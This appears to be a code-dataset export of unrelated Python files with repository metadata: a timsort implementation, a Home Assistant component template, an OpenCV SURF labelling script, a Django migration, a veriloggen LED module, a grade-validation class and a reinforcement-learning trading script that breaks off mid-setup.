def InsSort(arr, start, end):
    """Insertion-sort arr[start..end] (inclusive) in place and return arr."""
    for pos in range(start + 1, end + 1):
        current = arr[pos]
        hole = pos
        # Shift larger elements one slot right until current fits (stable).
        while hole > start and arr[hole - 1] > current:
            arr[hole] = arr[hole - 1]
            hole -= 1
        arr[hole] = current
    return arr
def merge(arr, start, mid, end):
    """Merge the adjacent sorted runs arr[start..mid] and arr[mid+1..end]
    in place and return arr. A degenerate right run (mid == end) is a no-op."""
    if mid == end:
        return arr
    left = arr[start:mid + 1]
    right = arr[mid + 1:end + 1]
    i = j = 0
    k = start
    while i < len(left) and j < len(right):
        if left[i] < right[j]:
            arr[k] = left[i]
            i += 1
        else:
            arr[k] = right[j]
            j += 1
        k += 1
    # Copy whichever run still has elements left.
    remaining_left = left[i:]
    arr[k:k + len(remaining_left)] = remaining_left
    k += len(remaining_left)
    remaining_right = right[j:]
    arr[k:k + len(remaining_right)] = remaining_right
    return arr
def TimSort(arr):
    """Simplified timsort: insertion-sort fixed minrun-sized chunks, then
    merge runs of doubling width until the whole list is sorted."""
    length = len(arr)
    run = GetMinrun(length)
    # Phase 1: sort each chunk of `run` elements with insertion sort.
    for lo in range(0, length, run):
        arr = InsSort(arr, lo, min(lo + run - 1, length - 1))
    # Phase 2: bottom-up merge of adjacent runs, doubling the width each pass.
    width = run
    while width < length:
        for lo in range(0, length, width * 2):
            middle = min(length - 1, lo + width - 1)
            hi = min(length - 1, middle + width)
            arr = merge(arr, lo, middle, hi)
        width *= 2
    return arr
# Compare the custom TimSort against Python's built-in sort on random data.
a = [random.randint(0, 60) for i in range(140)]
print('Исходный массив: ', a)
# Fix: `b = a` only aliased the list, so TimSort(a) (which sorts in place)
# would also mutate b. Take a real copy so b stays an independent snapshot.
b = a[:]
print('Python timsort: ', sorted(b))
print('My timsort:', TimSort(a))
|
[
"noreply@github.com"
] |
OlegLaiok.noreply@github.com
|
daf504ddb048bd9ff53c1be218bdef13eb0e3612
|
978d8f24f4985c61c2dce534a279abe6ffeff433
|
/custom_components/blueprint/__init__.py
|
7f90a41bded995d9a9e736289b3e45a104db0064
|
[
"MIT"
] |
permissive
|
JiriKursky/blueprint
|
3c1ad02c4726539ab07fc407b6c53ef4c903448b
|
92ae97dc5fec3a9a6e6e14031c32bbf2f1953ff6
|
refs/heads/master
| 2022-01-27T16:24:27.521422
| 2019-07-20T10:52:46
| 2019-07-20T10:52:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,577
|
py
|
"""
Component to integrate with blueprint.
For more details about this component, please refer to
https://github.com/custom-components/blueprint
"""
import os
from datetime import timedelta
import logging
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers import discovery
from homeassistant.util import Throttle
from .const import (
CONF_BINARY_SENSOR,
CONF_ENABLED,
CONF_NAME,
CONF_PASSWORD,
CONF_SENSOR,
CONF_SWITCH,
CONF_USERNAME,
DEFAULT_NAME,
DOMAIN_DATA,
DOMAIN,
ISSUE_URL,
PLATFORMS,
REQUIRED_FILES,
STARTUP,
VERSION,
)
# Minimum interval between data refreshes enforced by @Throttle below.
MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=30)
_LOGGER = logging.getLogger(__name__)
# Per-entry schema for the binary_sensor platform: optional enable flag + name.
BINARY_SENSOR_SCHEMA = vol.Schema(
    {
        vol.Optional(CONF_ENABLED, default=True): cv.boolean,
        vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
    }
)
# Per-entry schema for the sensor platform.
SENSOR_SCHEMA = vol.Schema(
    {
        vol.Optional(CONF_ENABLED, default=True): cv.boolean,
        vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
    }
)
# Per-entry schema for the switch platform.
SWITCH_SCHEMA = vol.Schema(
    {
        vol.Optional(CONF_ENABLED, default=True): cv.boolean,
        vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
    }
)
# Top-level configuration.yaml schema: optional credentials plus lists of
# platform entries; extra keys outside this domain are allowed.
CONFIG_SCHEMA = vol.Schema(
    {
        DOMAIN: vol.Schema(
            {
                vol.Optional(CONF_USERNAME): cv.string,
                vol.Optional(CONF_PASSWORD): cv.string,
                vol.Optional(CONF_BINARY_SENSOR): vol.All(
                    cv.ensure_list, [BINARY_SENSOR_SCHEMA]
                ),
                vol.Optional(CONF_SENSOR): vol.All(cv.ensure_list, [SENSOR_SCHEMA]),
                vol.Optional(CONF_SWITCH): vol.All(cv.ensure_list, [SWITCH_SCHEMA]),
            }
        )
    },
    extra=vol.ALLOW_EXTRA,
)
async def async_setup(hass, config):
    """Set up this component.

    Verifies the required component files, creates the shared data dict,
    builds the API client from the configured credentials, and schedules
    platform discovery for every enabled platform entry. Returns False
    (aborting setup) if any required file is missing.
    """
    # Import client from a external python package hosted on PyPi
    from sampleclient.client import Client
    # Print startup message
    startup = STARTUP.format(name=DOMAIN, version=VERSION, issueurl=ISSUE_URL)
    _LOGGER.info(startup)
    # Check that all required files are present
    file_check = await check_files(hass)
    if not file_check:
        return False
    # Create DATA dict
    hass.data[DOMAIN_DATA] = {}
    # Get "global" configuration.
    username = config[DOMAIN].get(CONF_USERNAME)
    password = config[DOMAIN].get(CONF_PASSWORD)
    # Configure the client.
    client = Client(username, password)
    hass.data[DOMAIN_DATA]["client"] = BlueprintData(hass, client)
    # Load platforms
    for platform in PLATFORMS:
        # Get platform specific configuration
        platform_config = config[DOMAIN].get(platform, {})
        # If platform is not enabled, skip.
        if not platform_config:
            continue
        for entry in platform_config:
            entry_config = entry
            # If entry is not enabled, skip.
            if not entry_config[CONF_ENABLED]:
                continue
            # Fire-and-forget: discovery loads the platform asynchronously.
            hass.async_create_task(
                discovery.async_load_platform(
                    hass, platform, DOMAIN, entry_config, config
                )
            )
    return True
class BlueprintData:
    """Owns the API client and refreshes its data into hass.data."""

    def __init__(self, hass, client):
        """Keep references to Home Assistant and the API client."""
        self.hass = hass
        self.client = client

    @Throttle(MIN_TIME_BETWEEN_UPDATES)
    async def update_data(self):
        """Fetch fresh data from the client (rate-limited by the throttle)."""
        # Main platform-data refresh; failures are logged, never raised.
        try:
            self.hass.data[DOMAIN_DATA]["data"] = self.client.get_data()
        except Exception as error:  # pylint: disable=broad-except
            _LOGGER.error("Could not update data - %s", error)
async def check_files(hass):
    """Return bool that indicates if all files are present."""
    # Verify that the user downloaded all files.
    base = "{}/custom_components/{}/".format(hass.config.path(), DOMAIN)
    missing = [file for file in REQUIRED_FILES if not os.path.exists(base + file)]
    if missing:
        _LOGGER.critical("The following files are missing: %s", str(missing))
        return False
    return True
|
[
"joasoe@gmail.com"
] |
joasoe@gmail.com
|
30e28adb243535de755e4dcd07f8c888edccef39
|
e89fafe220e0ae4a11e542e5f59f7340a6045854
|
/ValidationData.py
|
a78b21d02a14ff9430cbc88bc7e453eb790cb3aa
|
[] |
no_license
|
jvsd/AOR
|
5c389be6d4de887f454933254b0c2c03dfdf8924
|
9389e3ed5b061cf7829b87a2a44f4a824e0330d2
|
refs/heads/master
| 2016-09-06T19:32:53.679543
| 2012-03-02T09:42:54
| 2012-03-02T09:42:54
| 3,600,062
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,434
|
py
|
from numpy import *
from matplotlib.pyplot import *
import time
from sklearn import decomposition, svm
#from scikits.learn import datasets
#from scikits.learn import decomposition
#from scikits.learn.decomposition import pca
import cv
import Image
#Used to get validation data from an image
#Used to get validation data from an image
def GetData(src):
    """Interactively label 30 crops of *src* (Python 2 / legacy cv API).

    Walks a grid of 400x400 windows over the source image, shows each crop,
    and waits for a keypress: the '0' key labels the crop 0 ("Mark True"),
    any other key labels it 1 ("Mark False").
    Returns (cropped, targets): the list of crop images and a numpy array
    of 0/1 labels.
    """
    xt = 200   # horizontal step between windows
    yt = 200   # vertical step between rows
    xo = 400   # current window x origin
    yo = 2700  # current window y origin
    number = 30
    targets = zeros(number)
    cropped = [None]*number
    for i in range(0,number):
        cropped[i] = cv.CreateImage((400,400) , cv.IPL_DEPTH_8U, 3)
        # ROI selects the current 400x400 window; Copy snapshots it.
        cv.SetImageROI(src,(xo,yo,400,400))
        cv.Copy(src,cropped[i], None)
        cv.ResetImageROI(src)
        cv.ShowImage("Test",cropped[i])
        key = cv.WaitKey(0)
        #var = input("True or false?")
        # NOTE(review): pressing '0' leaves targets[i] at 0 but prints
        # "Mark True" -- the label/message mapping looks inverted; confirm
        # against how targets is consumed downstream.
        if (ord('0') == key):
            print 'Mark True'
        else:
            print 'Mark False'
            targets[i] = 1
        # Advance the window; wrap to the next row at the right edge.
        if xo == 8000-400:
            xo = 0
            yo = yt+yo
        else:
            xo = xo+xt
    return cropped,targets
def shuffle_unison(a, b):
    """Shuffle sequences a and b in place using the same permutation."""
    # Snapshot the RNG state so the second shuffle replays the first one.
    saved_state = random.get_state()
    random.shuffle(a)
    random.set_state(saved_state)
    random.shuffle(b)
def getObjectFeatures(image,targetsin):
    """Extract a 25x640 SURF feature matrix from one crop (legacy cv API).

    Builds 25 variants of *image* (5 rotations x 5 Gaussian blur levels),
    runs SURF on each, keeps the 10 strongest keypoints' 64-dim descriptors
    (10 * 64 = 640 values per variant, zero-padded when too few keypoints),
    and returns (features, [targetsin]*25) so each variant carries the same
    label.
    """
    size = (image.width, image.height)
    data = image.tostring()
    im1 = Image.fromstring("RGB",size,data)
    #Rotating an image using PIL
    rim1 = im1.rotate(72)
    rim2 = im1.rotate(72*2)
    rim3 = im1.rotate(72*3)
    rim4 = im1.rotate(72*4)
    rim5 = im1
    # Wrap each rotated PIL image back into an OpenCV header (no pixel copy).
    cvrim=[None]*5
    cvrim[0] = cv.CreateImageHeader(rim1.size, cv.IPL_DEPTH_8U, 3)
    cv.SetData(cvrim[0], rim1.tostring())
    cvrim[1] = cv.CreateImageHeader(rim2.size, cv.IPL_DEPTH_8U, 3)
    cv.SetData(cvrim[1], rim2.tostring())
    cvrim[2] = cv.CreateImageHeader(rim3.size, cv.IPL_DEPTH_8U, 3)
    cv.SetData(cvrim[2], rim3.tostring())
    cvrim[3] = cv.CreateImageHeader(rim4.size, cv.IPL_DEPTH_8U, 3)
    cv.SetData(cvrim[3], rim4.tostring())
    cvrim[4] = cv.CreateImageHeader(rim5.size, cv.IPL_DEPTH_8U, 3)
    cv.SetData(cvrim[4], rim5.tostring())
    #rim1.show()
    #cv.ShowImage("test",cvrim[0])
    #cv.WaitKey()
    #im = cv.LoadImageM('/Users/jamesd/Desktop/test.jpg',cv.CV_LOAD_IMAGE_GRAYSCALE)
    #im2 = cv.LoadImage('/Users/jamesd/Desktop/test.jpg')
    bwcvrim = [None]*5
    testset = [None]*25
    data =[None]*25
    for i in range(0,5):
        #tic = time.clock()
        bwcvrim[i] = cv.CreateImage((cvrim[i].width,cvrim[i].height) , cv.IPL_DEPTH_8U, 1)
        #cv.CvtColor(cvrim[i],bwcvrim[i], cv.CV_RGB2GRAY)
        # Single-channel extraction (third channel) then inverted threshold.
        cv.Split(cvrim[i],None,None,bwcvrim[i],None)
        cv.Threshold(bwcvrim[i],bwcvrim[i],60,255,cv.CV_THRESH_BINARY_INV)
        for b in range(0,5):
            temp = i*5
            testset[b+temp] = cv.CreateImage((bwcvrim[i].width,bwcvrim[i].height) , cv.IPL_DEPTH_8U, 1)
            # Increasing Gaussian kernel widths give 5 blur levels per rotation.
            adj = array([5,15,25,35,45])
            cv.Smooth(bwcvrim[i],testset[b+temp],cv.CV_GAUSSIAN,adj[b],5)
            cv.ShowImage("test",testset[b+temp])
            cv.WaitKey()
            (keypoints, descriptors) = cv.ExtractSURF(testset[b+temp],None,cv.CreateMemStorage(),(0,1,3,1))
            # Too few keypoints: substitute ten all-zero 69-value rows so the
            # fixed-size selection below still works.
            if (len(keypoints) < 10):
                keypoints = [None]*10
                for x in range(0,10):
                    keypoints[x] = zeros(69)
            else:
                # Append the 64-dim descriptor to each keypoint's 5 metadata
                # fields (point, laplacian, size, dir, hessian).
                for x in range(0,len(keypoints)):
                    keypoints[x] = keypoints[x] + tuple(descriptors[x])
            data[b+temp] = keypoints
            keypoints = [None]
            #print descriptors[0]
            #data[b+temp] =
            #keypoints[0] = keypoints[0] + descriptors[0]
            #print keypoints[0].append(descriptors[0])
    datapca = [None]*25
    dataout = [None]*25
    for i in range(0,25):
        sortby = "hessian"
        #keypoints[i].sort(key=itemgetter(sortby))
        temp = data[i]
        #print temp
        # Sort keypoints by hessian response (index 4), strongest first.
        data[i] = sorted(temp, key = lambda out: out[4])
        data[i].reverse()
        datapca[i] = data[i][0:10]
        #print datapca[0][9][4:]
        # Concatenate the 64-dim descriptors (fields after index 5) of the
        # 10 strongest keypoints into one 640-value feature vector.
        dataout[i] = datapca[i][0][5:] + datapca[i][1][5:] + datapca[i][2][5:] + datapca[i][3][5:] + datapca[i][4][5:] + datapca[i][5][5:] + datapca[i][6][5:] + datapca[i][7][5:] + datapca[i][8][5:] + datapca[i][9][5:]
        if (len(dataout[i]) < 640):
            dataout[i] = zeros(640)
    datax = asarray(dataout)
    #print 'length'
    #print len(datax[2])
    datatemp = zeros((25,640))
    for i in range(0,25):
        #print i
        datatemp[i] = datax[i][0:]
    temptarget = [targetsin]*25
    return datatemp,temptarget
# Script entry: interactively label crops of the source image, extract SURF
# features for every labelled crop, and save the stacked feature matrix and
# labels as .npy files for later training (Python 2 / legacy cv API).
source = 'Data/MLtest3.jpg'
src = cv.LoadImage(source, cv.CV_LOAD_IMAGE_UNCHANGED)
#im1 = Image.open(source)
#im2 = Image.open('/Users/jamesd/Desktop/5_5.jpg')
#test = Image.open('/Users/jamesd/Desktop/6.jpg')
testsource = 'Data/test.png'
#test = cv.LoadImage(testsource, cv.CV_LOAD_IMAGE_UNCHANGED)
#data1 = getObjectFeatures(im1,5)
#data2 = getObjectFeatures(im2,5)
#test1 = getObjectFeatures(test,5)
#test1 = asarray(test1)
#target = [1]*25
#target = [0]*25 + target
#targettest=[0]*25
#targettest=asarray(targettest)
#print shape(data1) #
#data = concatenate((data1,data2))
#target = asarray(target)
(cropped,targets) = GetData(src)
data =[]
target = [None]
print len(cropped)
print targets.shape
print type(cropped)
# Stack the 25-row feature block of every crop into one big matrix.
for i in range(0,len(cropped)):
    print i
    # NOTE(review): `input` shadows the builtin; harmless here but worth renaming.
    input = targets[i]
    if (i == 0):
        (data,target) = getObjectFeatures(cropped[i],input)
    else:
        (tempdata,temptargets) = getObjectFeatures(cropped[i],input)
        data = concatenate((data,tempdata))
        target = concatenate((target,temptargets))
#shuffle_unison(data,target)
#print target
save('Data/dataTemp.npy',data)
save('Data/targetTemp.npy',target)
#datatemp = asarray(datatemp)
#datatemp = ([datatemp,datatemp[0:]])
#print data.shape
#tic = time.clock()
#clf = svm.SVC()
#clf.fit(data, target)
#toc = time.clock()
#print "Time to Train..."
#print toc-tic
#print clf.score(test1,targettest)
#for i in range(0,25):
# print clf.predict(test1[i])
#for i in range(0,len(keypoints)-1):
# point = keypoints[i][0]
#print keypoints[i]
# cv.Circle(im2,point,35,(0,0,255,0),1,8,0)
#cv.SaveImage('/Users/jamesd/Desktop/testout.jpg',im2)
#print descriptors[3]
#print toc-tic
|
[
"jamesd2@email.arizona.edu"
] |
jamesd2@email.arizona.edu
|
c7da1a7b1f344da46059afb5af64ce7a6b8cdca0
|
207fa9b8e324506575899a1a4c53d9f60d7020b6
|
/negocios/migrations/0010_auto_20170523_1610.py
|
826a55fafb273a3115dafcc1cc875449f84ffaf4
|
[] |
no_license
|
diegomjasso/MyWashCar
|
fa11ec6a84ae17a112ed8a5c191bc85a9c21109c
|
570317aa8cbe0672f336eee01bcac0c5bfa7ae1b
|
refs/heads/master
| 2021-01-19T10:23:02.389550
| 2017-06-16T03:08:42
| 2017-06-16T03:08:42
| 87,857,582
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 484
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-05-23 21:10
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Changes the upload directory of the carwash logo ImageField.
    dependencies = [
        ('negocios', '0009_auto_20170519_1053'),
    ]
    operations = [
        migrations.AlterField(
            model_name='carwash',
            name='logo',
            field=models.ImageField(upload_to='static/assets/images/logoCarwash/'),
        ),
    ]
|
[
"rogelio.ortiz@softtek.com"
] |
rogelio.ortiz@softtek.com
|
921a1439c4b41746c803c1027e09f0d1502c2b93
|
55dc6e337e634acb852c570274a1d0358b7300a5
|
/tests/core/intz/intz.py
|
32ff67f7a362dffe3e6e8699ccb651f1b494c791
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
fifoteam/veriloggen
|
97ad45671f053c85f495b08a030f735fd9822146
|
23cb7251c0f126d40d249982cad33ef37902afef
|
refs/heads/master
| 2020-05-27T00:28:37.575411
| 2017-02-20T01:47:00
| 2017-02-20T01:47:00
| 82,518,602
| 2
| 0
| null | 2017-02-20T05:02:37
| 2017-02-20T05:02:37
| null |
UTF-8
|
Python
| false
| false
| 989
|
py
|
from __future__ import absolute_import
from __future__ import print_function
import sys
import os
# the next line can be removed after installation
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))))
from veriloggen import *
def mkLed():
    """Build and return a veriloggen 'blinkled' module.

    The module has a 32-bit counter that wraps at 1023; when the counter
    hits 1023 the LED output register is driven to high-impedance (IntZ).
    Both always-blocks are clocked on CLK's rising edge with synchronous RST.
    """
    m = Module('blinkled')
    width = m.Parameter('WIDTH', 8)
    clk = m.Input('CLK')
    rst = m.Input('RST')
    led = m.OutputReg('LED', width)
    count = m.Reg('count', 32)
    # Counter: reset to 0, otherwise count 0..1023 and wrap.
    m.Always(Posedge(clk))(
        If(rst)(
            count(0)
        ).Else(
            If(count == 1023)(
                count(0)
            ).Else(
                count(count + 1)
            )
        ))
    # LED: reset to 0; at the wrap point drive high-impedance (tri-state).
    m.Always(Posedge(clk))(
        If(rst)(
            led(0)
        ).Else(
            If(count == 1024 - 1)(
                led(IntZ())
            )
        ))
    return m
if __name__ == '__main__':
    # Emit the generated Verilog for the blink module to stdout.
    blink = mkLed()
    print(blink.to_verilog(''))
|
[
"shta.ky1018@gmail.com"
] |
shta.ky1018@gmail.com
|
5ba6efeb55d7d6654d6594edbbbc36ac84938f00
|
1cf71a4b1c45f622376fd096cabb97052d682a2c
|
/src/sample/note.py
|
e09834fcf8e12ef33bbbdc32c7ee81870fd9ad5e
|
[
"MIT"
] |
permissive
|
TestowanieAutomatyczneUG/laboratorium-10-marekpolom
|
9b1c8966a73b29f3961f0f76bb56c9f7819c3483
|
ba50ce33735827862d1d432e4348af6fce84ca5c
|
refs/heads/master
| 2023-01-28T22:43:27.776778
| 2020-12-08T16:05:57
| 2020-12-08T16:05:57
| 319,340,368
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 755
|
py
|
import re
class Note():
    """A named grade entry: a whitespace-free name and a grade in [2, 6]."""

    def __init__(self, name, note):
        """Validate and store *name* (no whitespace chars) and *note* (2..6).

        Raises Exception with a descriptive message on any invalid input.
        """
        try:
            if name is None:  # `is None`, not `== None` (identity check)
                raise Exception('Name can\'t be None')
            # Raw string: '\s' in a plain literal is an invalid escape
            # sequence (SyntaxWarning on modern Python). Pattern accepts any
            # name without whitespace, including the empty string.
            # NOTE(review): the message says "empty" but the check rejects
            # whitespace, not emptiness -- message kept for compatibility.
            if not re.search(r'^[^\s]*$', str(name)):
                raise Exception('Name can\'t be empty!')
            self.name = str(name)
        except ValueError:
            raise Exception('Value must be string!')
        try:
            if not (float(note) >= 2 and float(note) <= 6):
                raise Exception('Value must be >= 2 and <= 6')
            self.note = float(note)
        except ValueError:
            raise Exception('Value must be float')

    def getName(self):
        """Return the stored name."""
        return self.name

    def getNote(self):
        """Return the stored grade as a float."""
        return self.note
|
[
"marekpolom22@gmail.com"
] |
marekpolom22@gmail.com
|
83e4a2529c173ab183b0643cb5ba43df7aac40b2
|
be0abf6c8027b27407eb5272570c7cd262a74795
|
/ex3-self_learning_quant1.py
|
42bd4d0c7e25f268ee7b2392521002376a2c8e40
|
[
"MIT"
] |
permissive
|
jehung/sl-quant
|
70d032c78acd13a71b499d2ffe0fbb2a0a0bc325
|
b1eebfa5721dd43171a762b77b1dda180d28b869
|
refs/heads/master
| 2021-08-15T20:04:05.651975
| 2017-11-18T06:52:27
| 2017-11-18T06:52:27
| 109,555,098
| 0
| 1
| null | 2017-11-05T05:43:37
| 2017-11-05T05:43:37
| null |
UTF-8
|
Python
| false
| false
| 13,997
|
py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import numpy as np
np.random.seed(1335) # for reproducibility
np.set_printoptions(precision=5, suppress=True, linewidth=150)
import pandas as pd
import backtest as twp
from matplotlib import pyplot as plt
from sklearn import metrics, preprocessing
from talib.abstract import *
from sklearn.externals import joblib
import quandl
import random, timeit
from sklearn import preprocessing
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation
from keras.layers.recurrent import LSTM
from keras.optimizers import RMSprop, Adam
'''
Name: The Self Learning Quant, Example 3
Author: Daniel Zakrisson
Created: 30/03/2016
Copyright: (c) Daniel Zakrisson 2016
Licence: BSD
Requirements:
Numpy
Pandas
MatplotLib
scikit-learn
TA-Lib, instructions at https://mrjbq7.github.io/ta-lib/install.html
Keras, https://keras.io/
Quandl, https://www.quandl.com/tools/python
backtest.py from the TWP library. Download backtest.py and put in the same folder
/plt create a subfolder in the same directory where plot files will be saved
'''
#Load data
#Load data
def read_convert_data(symbol='XBTEUR'):
    """Download/read raw price data for *symbol* and cache it as a pickle.

    'XBTEUR' pulls Kraken BTC/EUR daily candles from Quandl; 'EURUSD_1day'
    parses a local CSV. NOTE(review): any other symbol leaves `prices`
    unbound and the final print raises UnboundLocalError.
    """
    if symbol == 'XBTEUR':
        prices = quandl.get("BCHARTS/KRAKENEUR")
        prices.to_pickle('XBTEUR_1day.pkl') # a /data folder must exist
    if symbol == 'EURUSD_1day':
        #prices = Quandl.get("ECB/EURUSD")
        prices = pd.read_csv('EURUSD_1day.csv',sep=",", skiprows=0, header=0, index_col=0, parse_dates=True, names=['ticker', 'date', 'time', 'open', 'low', 'high', 'close'])
        prices.to_pickle('EURUSD_1day.pkl')
    print(prices)
    return
def load_data(test=False):
    """Load pickled XBT/EUR daily candles and return a train or test slice.

    Training slice: rows [-2000:-300]; test slice: the full last 2000 rows.
    Column names are normalized to lower-case OHLCV.
    """
    prices = pd.read_pickle('XBTEUR_1day.pkl')
    prices.rename(columns={'Open': 'open', 'High': 'high', 'Low': 'low',
                           'Close': 'close', 'Volume (BTC)': 'volume'},
                  inplace=True)
    if test:
        return prices.iloc[-2000:]
    return prices.iloc[-2000:-300]
#Initialize first state, all items are placed deterministically
#Initialize first state, all items are placed deterministically
def init_state(indata, test=False):
    """Build the (close, diff, SMA15, close-SMA15, SMA15-SMA60, RSI, ATR)
    feature matrix from OHLCV data and return (first_state, xdata, close).

    In training mode a StandardScaler is fitted and persisted; in test mode
    the saved scaler is loaded. NOTE(review): the test branch still calls
    fit_transform (refits on test data) rather than transform -- confirm
    whether that is intentional.
    """
    close = indata['close'].values
    diff = np.diff(close)
    diff = np.insert(diff, 0, 0)  # pad so diff aligns with close
    sma15 = SMA(indata, timeperiod=15)
    sma60 = SMA(indata, timeperiod=60)
    rsi = RSI(indata, timeperiod=14)
    atr = ATR(indata, timeperiod=14)
    #--- Preprocess data
    xdata = np.column_stack((close, diff, sma15, close-sma15, sma15-sma60, rsi, atr))
    xdata = np.nan_to_num(xdata)  # indicator warm-up produces NaNs
    if test == False:
        scaler = preprocessing.StandardScaler()
        xdata = np.expand_dims(scaler.fit_transform(xdata), axis=1)
        joblib.dump(scaler, 'scaler.pkl')
    elif test == True:
        scaler = joblib.load('scaler.pkl')
        xdata = np.expand_dims(scaler.fit_transform(xdata), axis=1)
    # First window: shape (1, 1, num_features).
    state = xdata[0:1,0:1, :]
    return state, xdata, close
#Take Action
#Take Action
def take_action(state, xdata, action, signal, time_step):
    """Advance one step: record the trade signal for *action* and slide the
    market-data window forward.

    Returns (new_state, new_time_step, signal, terminal_state) where
    terminal_state is 1 once the window reaches the end of xdata.
    """
    time_step += 1
    next_state = xdata[time_step - 1:time_step, 0:1, :]
    # Terminal: the next step would run past the end of the data series.
    if time_step + 1 == xdata.shape[0]:
        signal.loc[time_step] = 0
        return next_state, time_step, signal, 1
    # 1 = long 100 shares, 2 = short 100 shares, anything else = flat.
    if action == 1:
        signal.loc[time_step] = 100
    elif action == 2:
        signal.loc[time_step] = -100
    else:
        signal.loc[time_step] = 0
    return next_state, time_step, signal, 0
#Get Reward, the reward is returned at the end of an episode
#Get Reward, the reward is returned at the end of an episode
def get_reward_value_iter(new_state, time_step, action, xdata, signal, terminal_state, epoch, eval=False):
    """Return a length-7 reward vector for the current step.

    Training (eval=False): reward is the one-step P&L of the last position.
    Evaluation at the terminal step: reward is the episode's total P&L and a
    trade plot is saved to plt/. NOTE(review): with eval=True on a
    non-terminal step the np.empty vector is returned unfilled (garbage
    values) -- confirm callers never hit that path.
    """
    rewards = np.empty(7)
    signal.fillna(value=0, inplace=True)
    if eval == False:
        # One-step P&L over the last two prices, scaled by position size.
        bt = twp.Backtest(pd.Series(data=[x for x in xdata[time_step-2:time_step]],
                                    index=signal[time_step-2:time_step].index.values),
                          signal[time_step-2:time_step], signalType='shares')
        reward = ((bt.data['price'].iloc[-1] - bt.data['price'].iloc[-2])*bt.data['shares'].iloc[-1])
        rewards.fill(reward)
    if terminal_state == 1 and eval == True:
        #save a figure of the test set
        bt = twp.Backtest(pd.Series(data=[x for x in xdata], index=signal.index.values), signal, signalType='shares')
        reward = bt.pnl.iloc[-1]
        rewards.fill(reward)
        plt.figure(figsize=(3,4))
        bt.plotTrades()
        plt.axvline(x=400, color='black', linestyle='--')
        plt.text(250, 400, 'training data')
        plt.text(450, 400, 'test data')
        plt.suptitle(str(epoch))
        plt.savefig('plt/'+'value_iter_'+str(epoch)+'.png', bbox_inches='tight', pad_inches=1, dpi=72)
        plt.close('all')
    print(time_step, terminal_state, eval, rewards)
    return rewards
def evaluate_Q(eval_data, eval_model, price_data, epoch=0):
    #This function is used to evaluate the performance of the system each epoch, without the influence of epsilon and random actions
    """Run one greedy (no-epsilon) episode with *eval_model* and return the
    final evaluation reward.

    NOTE(review): relies on the module-level `batch_size` global and rebinds
    the `price_data` parameter from init_state's return value.
    """
    signal = pd.Series(index=np.arange(len(eval_data)))
    state, xdata, price_data = init_state(eval_data)
    status = 1
    terminal_state = 0
    time_step = 1
    while(status == 1):
        #We start in state S
        qval = eval_model.predict(state, batch_size=batch_size)
        action = (np.argmax(qval))
        #Take action, observe new state S'
        new_state, time_step, signal, terminal_state = take_action(state, xdata, action, signal, time_step)
        #Observe reward
        eval_reward = get_reward_value_iter(new_state, time_step, action, price_data, signal, terminal_state, eval=True, epoch=epoch)
        state = new_state
        if terminal_state == 1: #terminal state
            status = 0
    return eval_reward
def value_iter(eval_data, reward, epsilon, epoch=0):
    """Run one greedy value-iteration episode over *eval_data*.

    Q-values are formed by projecting the normalized state onto *reward*;
    the argmax action is taken each step until the data window is exhausted.
    Returns the final evaluation reward vector.

    Fix: the body previously read the module-level global ``rewards``
    instead of its own ``reward`` parameter (which was silently unused).
    The only call site passes that same global, so behavior is unchanged.
    NOTE(review): ``epsilon`` is accepted but unused -- kept for signature
    compatibility.
    """
    signal = pd.Series(index=np.arange(len(eval_data)))
    state, xdata, price_data = init_state(eval_data)
    print(state.shape)
    status = 1
    terminal_state = 0
    time_step = 14
    while (status == 1):
        # We start in state S
        # Run the Q function on S to get predicted reward values on all the possible actions
        qval = np.dot(
            preprocessing.normalize(state.reshape(state.shape[0], -1), norm='l2', axis=0).reshape(state.shape),
            reward)
        action = (np.argmax(qval))
        new_state, time_step, signal, terminal_state = take_action(state, xdata, action, signal, time_step)
        # Observe reward
        eval_reward = get_reward_value_iter(new_state, time_step, action, price_data, signal, terminal_state, eval=True, epoch=epoch)
        # Take action, observe new state S'
        state = new_state
        if terminal_state == 1:  # terminal state
            status = 0
    return eval_reward
def policy_iter():
    """Placeholder for a policy-iteration variant; not implemented yet."""
    pass
# Ad-hoc probe: load the test window, build the initial state, and print the
# shapes/contents of state, feature matrix, and raw prices for inspection.
indata = load_data(test=True)
state, xdata, price_data = init_state(indata, test=True)
print('state')
print(state.shape)
print(state)
print()
print('xdata')
print(xdata.shape)
print(xdata)
print()
print('price_data')
print(price_data.shape)
print(price_data)
# Main training loop: Q-learning with an LSTM Q-network and experience replay.
if __name__ == "__main__":
    #This neural network is the the Q-function, run it like this:
    #model.predict(state.reshape(1,64), batch_size=1)
    batch_size = 7
    num_features = 7
    epochs = 10
    gamma = 0.95 # since the reward can be several time steps away, make gamma high
    epsilon = 1
    batchSize = 100
    buffer = 200
    replay = []
    learning_progress = []
    # Two stacked LSTMs -> dense head with 7 linear outputs (one per reward slot).
    model = Sequential()
    model.add(LSTM(64,
                   input_shape=(1, num_features),
                   return_sequences=True,
                   stateful=False))
    model.add(Dropout(0.5))
    model.add(LSTM(64,
                   input_shape=(1, num_features),
                   return_sequences=False,
                   stateful=False))
    model.add(Dropout(0.5))
    model.add(Dense(7, init='lecun_uniform'))
    model.add(Activation('linear')) #linear output so we can have range of real-valued outputs
    rms = RMSprop()
    adam = Adam()
    model.compile(loss='mse', optimizer=adam)
    start_time = timeit.default_timer()
    #read_convert_data(symbol='XBTEUR') #run once to read indata, resample and convert to pickle
    indata = load_data()
    test_data = load_data(test=True)
    #stores tuples of (S, A, R, S')
    h = 0
    #signal = pd.Series(index=market_data.index)
